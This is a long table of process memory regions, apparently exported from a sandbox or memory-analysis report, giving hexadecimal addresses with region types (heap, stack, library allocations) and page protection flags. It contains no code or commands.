||
|
13F95D46000
|
heap
|
page read and write
|
||
|
7FFD34420000
|
trusted library allocation
|
page execute and read and write
|
||
|
25D775D4000
|
heap
|
page read and write
|
||
|
25332FF000
|
stack
|
page read and write
|
||
|
979A4D3000
|
stack
|
page read and write
|
||
|
E44EE78000
|
stack
|
page read and write
|
||
|
1435BF34000
|
heap
|
page read and write
|
||
|
13F962C2000
|
trusted library allocation
|
page read and write
|
||
|
185E67DB000
|
heap
|
page read and write
|
||
|
185E85D8000
|
heap
|
page read and write
|
||
|
1B7EF462000
|
heap
|
page read and write
|
||
|
7FFD34580000
|
trusted library allocation
|
page read and write
|
||
|
185E687D000
|
heap
|
page read and write
|
||
|
185E687F000
|
heap
|
page read and write
|
||
|
1435A37C000
|
heap
|
page read and write
|
||
|
13F9665A000
|
trusted library allocation
|
page read and write
|
||
|
141D2F35000
|
heap
|
page read and write
|
||
|
25331FE000
|
stack
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
141D2F2D000
|
heap
|
page read and write
|
||
|
1B7D5200000
|
heap
|
page read and write
|
||
|
7FFD343FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
185E92AB000
|
heap
|
page read and write
|
||
|
141D0F85000
|
heap
|
page read and write
|
||
|
1B7D5480000
|
heap
|
page read and write
|
||
|
CEAEF9000
|
stack
|
page read and write
|
||
|
141D0F50000
|
heap
|
page read and write
|
||
|
1B7D78DD000
|
trusted library allocation
|
page read and write
|
||
|
185E93CF000
|
heap
|
page read and write
|
||
|
1B7D5269000
|
heap
|
page read and write
|
||
|
141D2F79000
|
heap
|
page read and write
|
||
|
7FFD34362000
|
trusted library allocation
|
page read and write
|
||
|
1435BF34000
|
heap
|
page read and write
|
||
|
185E92AB000
|
heap
|
page read and write
|
||
|
1B7D5273000
|
heap
|
page read and write
|
||
|
13F94290000
|
heap
|
page read and write
|
||
|
185E92AB000
|
heap
|
page read and write
|
||
|
13F94198000
|
heap
|
page read and write
|
||
|
1435BED0000
|
heap
|
page read and write
|
||
|
1B7D7B80000
|
trusted library allocation
|
page read and write
|
||
|
E44EFB9000
|
stack
|
page read and write
|
||
|
7FFD34630000
|
trusted library allocation
|
page read and write
|
||
|
141D2ECB000
|
heap
|
page read and write
|
||
|
1435BF4E000
|
heap
|
page read and write
|
||
|
25D77597000
|
heap
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
25D774C0000
|
heap
|
page read and write
|
||
|
1435BF25000
|
heap
|
page read and write
|
||
|
185E88D5000
|
heap
|
page read and write
|
||
|
185E6895000
|
heap
|
page read and write
|
||
|
1435A0EA000
|
heap
|
page read and write
|
||
|
141D11D9000
|
heap
|
page read and write
|
||
|
7FFD34660000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34426000
|
trusted library allocation
|
page execute and read and write
|
||
|
185E67B3000
|
heap
|
page read and write
|
||
|
185E8DA0000
|
heap
|
page read and write
|
||
|
227D9FF000
|
stack
|
page read and write
|
||
|
141D3124000
|
heap
|
page read and write
|
||
|
185E85CD000
|
heap
|
page read and write
|
||
|
7FFD34500000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B7D7556000
|
trusted library allocation
|
page read and write
|
||
|
E44EB7F000
|
stack
|
page read and write
|
||
|
141D2F3C000
|
heap
|
page read and write
|
||
|
979AB3E000
|
unkown
|
page read and write
|
||
|
7FFD345B0000
|
trusted library allocation
|
page read and write
|
||
|
141D2E8E000
|
heap
|
page read and write
|
||
|
141D2EA0000
|
heap
|
page read and write
|
||
|
7FFD3436D000
|
trusted library allocation
|
page execute and read and write
|
||
|
185E860E000
|
heap
|
page read and write
|
||
|
13FA6F36000
|
trusted library allocation
|
page read and write
|
||
|
185E85E1000
|
heap
|
page read and write
|
||
|
7FFD34620000
|
trusted library allocation
|
page read and write
|
||
|
185E8800000
|
heap
|
page read and write
|
||
|
25D7948C000
|
heap
|
page read and write
|
||
|
25D79473000
|
heap
|
page read and write
|
||
|
13F9C739000
|
trusted library allocation
|
page read and write
|
||
|
1435BF61000
|
heap
|
page read and write
|
||
|
141D2F79000
|
heap
|
page read and write
|
||
|
1435BE93000
|
heap
|
page read and write
|
||
|
141D0F70000
|
heap
|
page read and write
|
||
|
979A9FE000
|
stack
|
page read and write
|
||
|
1B7D73D0000
|
heap
|
page execute and read and write
|
||
|
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
|
185E882E000
|
heap
|
page read and write
|
||
|
185E8635000
|
heap
|
page read and write
|
||
|
25D774E0000
|
heap
|
page read and write
|
||
|
185E9309000
|
heap
|
page read and write
|
||
|
1B7D7297000
|
heap
|
page read and write
|
||
|
25D79630000
|
heap
|
page execute and read and write
|
||
|
2532FFE000
|
stack
|
page read and write
|
||
|
185E9345000
|
heap
|
page read and write
|
||
|
141D2E82000
|
heap
|
page read and write
|
||
|
185E89E0000
|
heap
|
page read and write
|
||
|
185E88C1000
|
heap
|
page read and write
|
||
|
1B7E744F000
|
trusted library allocation
|
page read and write
|
||
|
979AF3E000
|
stack
|
page read and write
|
||
|
7FFD3435B000
|
trusted library allocation
|
page read and write
|
||
|
185E88C1000
|
heap
|
page read and write
|
||
|
13F96632000
|
trusted library allocation
|
page read and write
|
||
|
1435A0ED000
|
heap
|
page read and write
|
||
|
25D774E4000
|
heap
|
page read and write
|
||
|
185E93C9000
|
heap
|
page read and write
|
||
|
13FA6250000
|
trusted library allocation
|
page read and write
|
||
|
1435BEE5000
|
heap
|
page read and write
|
||
|
185E88D5000
|
heap
|
page read and write
|
||
|
1B7D732B000
|
heap
|
page read and write
|
||
|
1435BF59000
|
heap
|
page read and write
|
||
|
25D00001000
|
trusted library allocation
|
page read and write
|
||
|
25D00083000
|
trusted library allocation
|
page read and write
|
||
|
979A8FE000
|
stack
|
page read and write
|
||
|
141D2E93000
|
heap
|
page read and write
|
||
|
185E91B4000
|
heap
|
page read and write
|
||
|
25D0005C000
|
trusted library allocation
|
page read and write
|
||
|
141D2F80000
|
heap
|
page read and write
|
||
|
1435A0EC000
|
heap
|
page read and write
|
||
|
25D7950D000
|
heap
|
page read and write
|
||
|
141D307D000
|
heap
|
page read and write
|
||
|
25D791F0000
|
heap
|
page execute and read and write
|
||
|
1B7D74AC000
|
trusted library allocation
|
page read and write
|
||
|
25D00102000
|
trusted library allocation
|
page read and write
|
||
|
185E85C0000
|
heap
|
page read and write
|
||
|
1B7D7441000
|
trusted library allocation
|
page read and write
|
||
|
1435A379000
|
heap
|
page read and write
|
||
|
141D2E97000
|
heap
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
185E91E6000
|
heap
|
page read and write
|
||
|
7FFD345A0000
|
trusted library allocation
|
page read and write
|
||
|
141D2F67000
|
heap
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
1B7D7254000
|
heap
|
page read and write
|
||
|
1B7D5220000
|
heap
|
page read and write
|
||
|
7FFD3441C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34460000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B7EF870000
|
heap
|
page read and write
|
||
|
1B7EF540000
|
heap
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
141D307C000
|
heap
|
page read and write
|
||
|
1435A379000
|
heap
|
page read and write
|
||
|
185E92AC000
|
heap
|
page read and write
|
||
|
185E93B9000
|
heap
|
page read and write
|
||
|
141D1024000
|
heap
|
page read and write
|
||
|
1435A0ED000
|
heap
|
page read and write
|
||
|
185E8805000
|
heap
|
page read and write
|
||
|
141D2F64000
|
heap
|
page read and write
|
||
|
185E9418000
|
heap
|
page read and write
|
||
|
185E91B0000
|
heap
|
page read and write
|
||
|
141D11DE000
|
heap
|
page read and write
|
||
|
141D2E9B000
|
heap
|
page read and write
|
||
|
185E9473000
|
heap
|
page read and write
|
||
|
1435D9D2000
|
heap
|
page read and write
|
||
|
13F941B0000
|
heap
|
page read and write
|
||
|
227D7FF000
|
stack
|
page read and write
|
||
|
E44FC8E000
|
stack
|
page read and write
|
||
|
185E92D0000
|
heap
|
page read and write
|
||
|
25D77480000
|
heap
|
page read and write
|
||
|
185E6837000
|
heap
|
page read and write
|
||
|
185E93C9000
|
heap
|
page read and write
|
||
|
185E93C3000
|
heap
|
page read and write
|
||
|
1435BF54000
|
heap
|
page read and write
|
||
|
185E67CA000
|
heap
|
page read and write
|
||
|
185E8877000
|
heap
|
page read and write
|
||
|
1435A350000
|
heap
|
page read and write
|
||
|
CEAFFD000
|
stack
|
page read and write
|
||
|
7FFD34502000
|
trusted library allocation
|
page read and write
|
||
|
141D2F65000
|
heap
|
page read and write
|
||
|
185E85C6000
|
heap
|
page read and write
|
||
|
141D1024000
|
heap
|
page read and write
|
||
|
CEABFE000
|
stack
|
page read and write
|
||
|
185E85CD000
|
heap
|
page read and write
|
||
|
1B7D6C50000
|
trusted library allocation
|
page read and write
|
||
|
13F9421D000
|
heap
|
page read and write
|
||
|
1B7D6CE0000
|
trusted library allocation
|
page read and write
|
||
|
185E6765000
|
heap
|
page read and write
|
||
|
1435BF28000
|
heap
|
page read and write
|
||
|
CEBE4C000
|
stack
|
page read and write
|
||
|
141D2ECB000
|
heap
|
page read and write
|
||
|
1435BEED000
|
heap
|
page read and write
|
||
|
25D79410000
|
heap
|
page read and write
|
||
|
7FFD34610000
|
trusted library allocation
|
page read and write
|
||
|
1435BF4E000
|
heap
|
page read and write
|
||
|
185E85F3000
|
heap
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
1B7D52D3000
|
heap
|
page read and write
|
||
|
185E889F000
|
heap
|
page read and write
|
||
|
185E93AB000
|
heap
|
page read and write
|
||
|
1435C060000
|
heap
|
page read and write
|
||
|
141D2E8E000
|
heap
|
page read and write
|
||
|
CEAD7E000
|
stack
|
page read and write
|
||
|
7FFD34510000
|
trusted library allocation
|
page execute and read and write
|
||
|
1435A0CD000
|
heap
|
page read and write
|
||
|
185E85C2000
|
heap
|
page read and write
|
||
|
1435BE74000
|
heap
|
page read and write
|
||
|
1435BF44000
|
heap
|
page read and write
|
||
|
141D0EF0000
|
heap
|
page read and write
|
||
|
13F94370000
|
heap
|
page read and write
|
||
|
1435A04D000
|
heap
|
page read and write
|
||
|
13F94218000
|
heap
|
page read and write
|
||
|
13F9669B000
|
trusted library allocation
|
page read and write
|
||
|
2532DFE000
|
stack
|
page read and write
|
||
|
141D2E94000
|
heap
|
page read and write
|
||
|
141D2FE3000
|
heap
|
page read and write
|
||
|
141D49E6000
|
heap
|
page read and write
|
||
|
1435A0F7000
|
heap
|
page read and write
|
||
|
141D2ED3000
|
heap
|
page read and write
|
||
|
1435BF3D000
|
heap
|
page read and write
|
||
|
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
|
185E87D0000
|
remote allocation
|
page read and write
|
||
|
141D307E000
|
heap
|
page read and write
|
||
|
7FFD343F0000
|
trusted library allocation
|
page read and write
|
||
|
25D775D8000
|
heap
|
page read and write
|
||
|
CEAB7E000
|
stack
|
page read and write
|
||
|
1435A0FC000
|
heap
|
page read and write
|
||
|
141D2F70000
|
heap
|
page read and write
|
||
|
1B7E74AD000
|
trusted library allocation
|
page read and write
|
||
|
1435A0E9000
|
heap
|
page read and write
|
||
|
141D2F64000
|
heap
|
page read and write
|
||
|
185E8750000
|
heap
|
page read and write
|
||
|
185E93F8000
|
heap
|
page read and write
|
||
|
1435BF19000
|
heap
|
page read and write
|
||
|
13F96463000
|
trusted library allocation
|
page read and write
|
||
|
185E8826000
|
heap
|
page read and write
|
||
|
185E93AD000
|
heap
|
page read and write
|
||
|
141D0F79000
|
heap
|
page read and write
|
||
|
1435BF04000
|
heap
|
page read and write
|
||
|
1435BEAB000
|
heap
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
1435BED8000
|
heap
|
page read and write
|
||
|
1435A060000
|
heap
|
page read and write
|
||
|
141D2F48000
|
heap
|
page read and write
|
||
|
227D5FE000
|
stack
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
141D1020000
|
heap
|
page read and write
|
||
|
1B7D7A53000
|
trusted library allocation
|
page read and write
|
||
|
227DFFB000
|
stack
|
page read and write
|
||
|
185E88CF000
|
heap
|
page read and write
|
||
|
1435A0E8000
|
heap
|
page read and write
|
||
|
185E88FF000
|
heap
|
page read and write
|
||
|
141D2F64000
|
heap
|
page read and write
|
||
|
1435A0FC000
|
heap
|
page read and write
|
||
|
141D2F45000
|
heap
|
page read and write
|
||
|
141D2E93000
|
heap
|
page read and write
|
||
|
141D2EA4000
|
heap
|
page read and write
|
||
|
185E88A9000
|
heap
|
page read and write
|
||
|
7FFD345B0000
|
trusted library allocation
|
page read and write
|
||
|
1435A37E000
|
heap
|
page read and write
|
||
|
13F941F0000
|
heap
|
page read and write
|
||
|
185E93B4000
|
heap
|
page read and write
|
||
|
185E6720000
|
heap
|
page read and write
|
||
|
CEB0FF000
|
stack
|
page read and write
|
||
|
1B7D5251000
|
heap
|
page read and write
|
||
|
13F9C735000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34530000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD3451A000
|
trusted library allocation
|
page read and write
|
||
|
E44EC7D000
|
stack
|
page read and write
|
||
|
7FFD34511000
|
trusted library allocation
|
page read and write
|
||
|
25D004FC000
|
trusted library allocation
|
page read and write
|
||
|
185E687D000
|
heap
|
page read and write
|
||
|
185E8878000
|
heap
|
page read and write
|
||
|
1435BE6E000
|
heap
|
page read and write
|
||
|
185E946A000
|
heap
|
page read and write
|
||
|
1435BEF9000
|
heap
|
page read and write
|
||
|
185E882C000
|
heap
|
page read and write
|
||
|
1435BE98000
|
heap
|
page read and write
|
||
|
25D00011000
|
trusted library allocation
|
page read and write
|
||
|
141D11D0000
|
heap
|
page read and write
|
||
|
E44F13F000
|
stack
|
page read and write
|
||
|
185E88FD000
|
heap
|
page read and write
|
||
|
141D2E88000
|
heap
|
page read and write
|
||
|
185E687F000
|
heap
|
page read and write
|
||
|
227DBFB000
|
stack
|
page read and write
|
||
|
1435BF40000
|
heap
|
page read and write
|
||
|
25D77504000
|
heap
|
page read and write
|
||
|
141D2EB3000
|
heap
|
page read and write
|
||
|
185E88FD000
|
heap
|
page read and write
|
||
|
25D7948A000
|
heap
|
page read and write
|
||
|
1B7D7872000
|
trusted library allocation
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
1B7D6C60000
|
heap
|
page readonly
|
||
|
2F0C8FE000
|
stack
|
page read and write
|
||
|
7FFD34344000
|
trusted library allocation
|
page read and write
|
||
|
185E91D0000
|
heap
|
page read and write
|
||
|
141D2F64000
|
heap
|
page read and write
|
||
|
1435BE87000
|
heap
|
page read and write
|
||
|
185E88F5000
|
heap
|
page read and write
|
||
|
1435BEA4000
|
heap
|
page read and write
|
||
|
185E88FF000
|
heap
|
page read and write
|
||
|
1B7D6D86000
|
heap
|
page read and write
|
||
|
25D00241000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34520000
|
trusted library allocation
|
page execute and read and write
|
||
|
13F988DB000
|
trusted library allocation
|
page read and write
|
||
|
1435BE7B000
|
heap
|
page read and write
|
||
|
CEB27F000
|
stack
|
page read and write
|
||
|
185E8893000
|
heap
|
page read and write
|
||
|
185E88D5000
|
heap
|
page read and write
|
||
|
185E8893000
|
heap
|
page read and write
|
||
|
979A5DE000
|
stack
|
page read and write
|
||
|
979A87F000
|
stack
|
page read and write
|
||
|
185E88FD000
|
heap
|
page read and write
|
||
|
1B7D7566000
|
trusted library allocation
|
page read and write
|
||
|
185E9386000
|
heap
|
page read and write
|
||
|
141D49E0000
|
heap
|
page read and write
|
||
|
141D3080000
|
heap
|
page read and write
|
||
|
1435BE6E000
|
heap
|
page read and write
|
||
|
1B7D52B6000
|
heap
|
page read and write
|
||
|
25D77500000
|
heap
|
page read and write
|
||
|
7FFD34600000
|
trusted library allocation
|
page read and write
|
||
|
1435BE80000
|
heap
|
page read and write
|
||
|
141D2F74000
|
heap
|
page read and write
|
||
|
25D794E4000
|
heap
|
page read and write
|
||
|
13F96636000
|
trusted library allocation
|
page read and write
|
||
|
E44F23E000
|
stack
|
page read and write
|
||
|
1435A05C000
|
heap
|
page read and write
|
||
|
7FFD34610000
|
trusted library allocation
|
page read and write
|
||
|
1435A03D000
|
heap
|
page read and write
|
||
|
13F9B0DB000
|
trusted library allocation
|
page read and write
|
||
|
227D8FE000
|
stack
|
page read and write
|
||
|
227DCFE000
|
stack
|
page read and write
|
||
|
185E6895000
|
heap
|
page read and write
|
||
|
1435BF50000
|
heap
|
page read and write
|
||
|
7FFD34630000
|
trusted library allocation
|
page read and write
|
||
|
1435BE8C000
|
heap
|
page read and write
|
||
|
7FFD345F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34364000
|
trusted library allocation
|
page read and write
|
||
|
141D2F6E000
|
heap
|
page read and write
|
||
|
141D11DC000
|
heap
|
page read and write
|
||
|
E44EDFF000
|
stack
|
page read and write
|
||
|
13F9C73D000
|
trusted library allocation
|
page read and write
|
||
|
185E85DE000
|
heap
|
page read and write
|
||
|
1435A370000
|
heap
|
page read and write
|
||
|
1B7D52B0000
|
heap
|
page read and write
|
||
|
1435BE62000
|
heap
|
page read and write
|
||
|
1B7D79BC000
|
trusted library allocation
|
page read and write
|
||
|
13F95C90000
|
heap
|
page execute and read and write
|
||
|
CEB1FE000
|
stack
|
page read and write
|
||
|
7FFD345E0000
|
trusted library allocation
|
page read and write
|
||
|
1435A379000
|
heap
|
page read and write
|
||
|
7DF4EF1F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD345E0000
|
trusted library allocation
|
page read and write
|
||
|
13F95D40000
|
heap
|
page read and write
|
||
|
185E860E000
|
heap
|
page read and write
|
||
|
25D0003D000
|
trusted library allocation
|
page read and write
|
||
|
1435BF01000
|
heap
|
page read and write
|
||
|
141D2E83000
|
heap
|
page read and write
|
||
|
1435C05E000
|
heap
|
page read and write
|
||
|
1435A37D000
|
heap
|
page read and write
|
||
|
141D2F64000
|
heap
|
page read and write
|
||
|
13F95BC0000
|
trusted library allocation
|
page read and write
|
||
|
185E92AB000
|
heap
|
page read and write
|
||
|
185E88FF000
|
heap
|
page read and write
|
||
|
185E8617000
|
heap
|
page read and write
|
||
|
14359F80000
|
heap
|
page read and write
|
||
|
1435BF10000
|
heap
|
page read and write
|
||
|
141D2F5D000
|
heap
|
page read and write
|
||
|
185E85E1000
|
heap
|
page read and write
|
||
|
1435BF44000
|
heap
|
page read and write
|
||
|
25D0010C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD344F1000
|
trusted library allocation
|
page read and write
|
||
|
25D000FC000
|
trusted library allocation
|
page read and write
|
||
|
13F9BADB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34620000
|
trusted library allocation
|
page read and write
|
||
|
1B7D526B000
|
heap
|
page read and write
|
||
|
185E687F000
|
heap
|
page read and write
|
||
|
1435C05E000
|
heap
|
page read and write
|
||
|
1435BF47000
|
heap
|
page read and write
|
||
|
CEB17E000
|
stack
|
page read and write
|
||
|
185E88D5000
|
heap
|
page read and write
|
||
|
7FFD34500000
|
trusted library allocation
|
page read and write
|
||
|
2F0C7FE000
|
stack
|
page read and write
|
||
|
1B7E7441000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34680000
|
trusted library allocation
|
page read and write
|
||
|
1435A057000
|
heap
|
page read and write
|
||
|
7FFD34560000
|
trusted library allocation
|
page read and write
|
||
|
141D3081000
|
heap
|
page read and write
|
||
|
141D2F51000
|
heap
|
page read and write
|
||
|
1435C104000
|
heap
|
page read and write
|
||
|
141D2F54000
|
heap
|
page read and write
|
||
|
1435BE63000
|
heap
|
page read and write
|
||
|
185E85DA000
|
heap
|
page read and write
|
||
|
1435A378000
|
heap
|
page read and write
|
||
|
185E946A000
|
heap
|
page read and write
|
||
|
141D2E89000
|
heap
|
page read and write
|
||
|
185E67A0000
|
heap
|
page read and write
|
||
|
13F99CDB000
|
trusted library allocation
|
page read and write
|
||
|
13F94584000
|
heap
|
page read and write
|
||
|
2F0C9FF000
|
stack
|
page read and write
|
||
|
185E6895000
|
heap
|
page read and write
|
||
|
141D2E82000
|
heap
|
page read and write
|
||
|
1B7D7210000
|
heap
|
page execute and read and write
|
||
|
185E88FF000
|
heap
|
page read and write
|
||
|
185E88D0000
|
heap
|
page read and write
|
||
|
1B7D79D4000
|
trusted library allocation
|
page read and write
|
||
|
E44EBFE000
|
stack
|
page read and write
|
||
|
CEBCCE000
|
stack
|
page read and write
|
||
|
141D101A000
|
heap
|
page read and write
|
||
|
141D2E93000
|
heap
|
page read and write
|
||
|
185E85D2000
|
heap
|
page read and write
|
||
|
185E85E6000
|
heap
|
page read and write
|
||
|
185E6895000
|
heap
|
page read and write
|
||
|
7FFD34522000
|
trusted library allocation
|
page read and write
|
||
|
1B7D7563000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34570000
|
trusted library allocation
|
page read and write
|
||
|
1B7D745F000
|
trusted library allocation
|
page read and write
|
||
|
141D11DE000
|
heap
|
page read and write
|
||
|
185E948A000
|
heap
|
page read and write
|
||
|
7FFD344FA000
|
trusted library allocation
|
page read and write
|
||
|
185E8180000
|
heap
|
page read and write
|
||
|
185E67DC000
|
heap
|
page read and write
|
||
|
1B7D5485000
|
heap
|
page read and write
|
||
|
2F0C6FF000
|
stack
|
page read and write
|
||
|
185E85E1000
|
heap
|
page read and write
|
||
|
25D77520000
|
trusted library allocation
|
page read and write
|
||
|
1435A37E000
|
heap
|
page read and write
|
||
|
13F95C70000
|
trusted library allocation
|
page read and write
|
||
|
141D0F78000
|
heap
|
page read and write
|
||
|
E44F0BE000
|
stack
|
page read and write
|
||
|
1435BF44000
|
heap
|
page read and write
|
||
|
CEBDCD000
|
stack
|
page read and write
|
||
|
25D00038000
|
trusted library allocation
|
page read and write
|
||
|
1435A042000
|
heap
|
page read and write
|
||
|
185E8700000
|
heap
|
page read and write
|
||
|
141D2ED0000
|
heap
|
page read and write
|
||
|
13F95D44000
|
heap
|
page read and write
|
||
|
141D0F20000
|
heap
|
page read and write
|
||
|
14359FE4000
|
heap
|
page read and write
|
||
|
13F9C4DB000
|
trusted library allocation
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
25D10001000
|
trusted library allocation
|
page read and write
|
||
|
1435A020000
|
heap
|
page read and write
|
||
|
141D102E000
|
heap
|
page read and write
|
||
|
1435BE77000
|
heap
|
page read and write
|
||
|
1435A0D1000
|
heap
|
page read and write
|
||
|
185E866B000
|
heap
|
page read and write
|
||
|
185E93D6000
|
heap
|
page read and write
|
||
|
227D105000
|
stack
|
page read and write
|
||
|
1435BEC0000
|
heap
|
page read and write
|
||
|
1435BF15000
|
heap
|
page read and write
|
||
|
1435BEAB000
|
heap
|
page read and write
|
||
|
7FFD34542000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34640000
|
trusted library allocation
|
page read and write
|
||
|
1435C05C000
|
heap
|
page read and write
|
||
|
1435A05D000
|
heap
|
page read and write
|
||
|
1435BE73000
|
heap
|
page read and write
|
||
|
141D2F24000
|
heap
|
page read and write
|
||
|
141D49E5000
|
heap
|
page read and write
|
||
|
185E8820000
|
heap
|
page read and write
|
||
|
CEAF77000
|
stack
|
page read and write
|
||
|
13F94190000
|
heap
|
page read and write
|
||
|
1B7D756A000
|
trusted library allocation
|
page read and write
|
||
|
25D004A2000
|
trusted library allocation
|
page read and write
|
||
|
141D0F70000
|
heap
|
page read and write
|
||
|
7FFD3434D000
|
trusted library allocation
|
page execute and read and write
|
||
|
25D79530000
|
heap
|
page read and write
|
||
|
185E85C2000
|
heap
|
page read and write
|
||
|
7FFD34580000
|
trusted library allocation
|
page read and write
|
||
|
13FA7936000
|
trusted library allocation
|
page read and write
|
||
|
185E8893000
|
heap
|
page read and write
|
||
|
1435D9CC000
|
heap
|
page read and write
|
||
|
13F941D0000
|
heap
|
page read and write
|
||
|
1435BF44000
|
heap
|
page read and write
|
||
|
185E91D4000
|
heap
|
page read and write
|
||
|
185E67CB000
|
heap
|
page read and write
|
||
|
1435BEAB000
|
heap
|
page read and write
|
||
|
141D2F30000
|
heap
|
page read and write
|
||
|
1435D9C0000
|
heap
|
page read and write
|
||
|
185E88F5000
|
heap
|
page read and write
|
||
|
13F9709B000
|
trusted library allocation
|
page read and write
|
||
|
185E8870000
|
heap
|
page read and write
|
||
|
141D102A000
|
heap
|
page read and write
|
||
|
25330FE000
|
stack
|
page read and write
|
||
|
141D2F75000
|
heap
|
page read and write
|
||
|
25D77550000
|
heap
|
page read and write
|
||
|
1435BF44000
|
heap
|
page read and write
|
||
|
185E6710000
|
heap
|
page read and write
|
||
|
185E8893000
|
heap
|
page read and write
|
||
|
13F95BE0000
|
trusted library allocation
|
page read and write
|
||
|
CEA7DE000
|
stack
|
page read and write
|
||
|
1435BE6E000
|
heap
|
page read and write
|
||
|
1B7EF440000
|
heap
|
page read and write
|
||
|
25D00109000
|
trusted library allocation
|
page read and write
|
||
|
1B7D7305000
|
heap
|
page read and write
|
||
|
1B7D53F0000
|
heap
|
page read and write
|
||
|
141D101F000
|
heap
|
page read and write
|
||
|
141D2F70000
|
heap
|
page read and write
|
||
|
25D77540000
|
trusted library allocation
|
page read and write
|
||
|
185E9402000
|
heap
|
page read and write
|
||
|
7FFD345A0000
|
trusted library allocation
|
page read and write
|
||
|
185E88FD000
|
heap
|
page read and write
|
||
|
185E8838000
|
heap
|
page read and write
|
||
|
185E866B000
|
heap
|
page read and write
|
||
|
25D794BD000
|
heap
|
page read and write
|
||
|
141D2B34000
|
heap
|
page read and write
|
||
|
185E860B000
|
heap
|
page read and write
|
||
|
979A97D000
|
stack
|
page read and write
|
||
|
7FFD345F0000
|
trusted library allocation
|
page read and write
|
||
|
13F96241000
|
trusted library allocation
|
page read and write
|
||
|
141D0F7E000
|
heap
|
page read and write
|
||
|
25D003C8000
|
trusted library allocation
|
page read and write
|
||
|
141D0FF1000
|
heap
|
page read and write
|
||
|
E44EA73000
|
stack
|
page read and write
|
||
|
141D2EE0000
|
heap
|
page read and write
|
||
|
25D796D0000
|
heap
|
page read and write
|
||
|
13FA6241000
|
trusted library allocation
|
page read and write
|
||
|
CEAAFE000
|
stack
|
page read and write
|
||
|
25D000FF000
|
trusted library allocation
|
page read and write
|
||
|
185E91D5000
|
heap
|
page read and write
|
||
|
141D2A90000
|
heap
|
page read and write
|
||
|
141D0F8C000
|
heap
|
page read and write
|
||
|
1B7D72F8000
|
heap
|
page read and write
|
||
|
185E92AB000
|
heap
|
page read and write
|
||
|
141D0F7F000
|
heap
|
page read and write
|
||
|
1435BF0D000
|
heap
|
page read and write
|
||
|
141D2F10000
|
heap
|
page read and write
|
||
|
185E92AB000
|
heap
|
page read and write
|
||
|
141D2EBF000
|
heap
|
page read and write
|
||
|
185E8870000
|
heap
|
page read and write
|
||
|
1435BED5000
|
heap
|
page read and write
|
||
|
1435BE73000
|
heap
|
page read and write
|
||
|
1435BE68000
|
heap
|
page read and write
|
||
|
185E93EA000
|
heap
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
185E8870000
|
heap
|
page read and write
|
||
|
1435BF59000
|
heap
|
page read and write
|
||
|
1435BE63000
|
heap
|
page read and write
|
||
|
25D79140000
|
trusted library allocation
|
page read and write
|
||
|
25D0014D000
|
trusted library allocation
|
page read and write
|
||
|
185E882F000
|
heap
|
page read and write
|
||
|
185E85CF000
|
heap
|
page read and write
|
||
|
1435BF60000
|
heap
|
page read and write
|
||
|
14359FE0000
|
heap
|
page read and write
|
||
|
141D0F6B000
|
heap
|
page read and write
|
||
|
185E85FB000
|
heap
|
page read and write
|
||
|
141D11D9000
|
heap
|
page read and write
|
||
|
13F941D6000
|
heap
|
page read and write
|
||
|
1435BEB0000
|
heap
|
page read and write
|
||
|
141D2EF8000
|
heap
|
page read and write
|
||
|
185E67D7000
|
heap
|
page read and write
|
||
|
185E85C4000
|
heap
|
page read and write
|
||
|
7FFD34550000
|
trusted library allocation
|
page read and write
|
||
|
185E88C1000
|
heap
|
page read and write
|
||
|
25D79200000
|
heap
|
page execute and read and write
|
||
|
185E8909000
|
heap
|
page read and write
|
||
|
1435A0C2000
|
heap
|
page read and write
|
||
|
185E8618000
|
heap
|
page read and write
|
||
|
185E8BB0000
|
heap
|
page read and write
|
||
|
1435BEF0000
|
heap
|
page read and write
|
||
|
25D79130000
|
heap
|
page readonly
|
||
|
13F941DE000
|
heap
|
page read and write
|
||
|
1B7D73D7000
|
heap
|
page execute and read and write
|
||
|
141D2ECB000
|
heap
|
page read and write
|
||
|
141D2E86000
|
heap
|
page read and write
|
||
|
185E946A000
|
heap
|
page read and write
|
||
|
25D77460000
|
heap
|
page read and write
|
||
|
1435DCF0000
|
trusted library allocation
|
page read and write
|
||
|
13FA6536000
|
trusted library allocation
|
page read and write
|
||
|
141D102A000
|
heap
|
page read and write
|
||
|
1B7D6D80000
|
heap
|
page read and write
|
||
|
185E67DF000
|
heap
|
page read and write
|
||
|
CEB079000
|
stack
|
page read and write
|
||
|
141D2ECB000
|
heap
|
page read and write
|
||
|
25D794D0000
|
heap
|
page read and write
|
||
|
7FFD34400000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F0C4FE000
|
stack
|
page read and write
|
||
|
7FFD34480000
|
trusted library allocation
|
page execute and read and write
|
||
|
1435BF50000
|
heap
|
page read and write
|
||
|
141D0F00000
|
heap
|
page read and write
|
||
|
185E8603000
|
heap
|
page read and write
|
||
|
1B7D7825000
|
trusted library allocation
|
page read and write
|
||
|
185E6895000
|
heap
|
page read and write
|
||
|
185E85C5000
|
heap
|
page read and write
|
||
|
1B7EF460000
|
heap
|
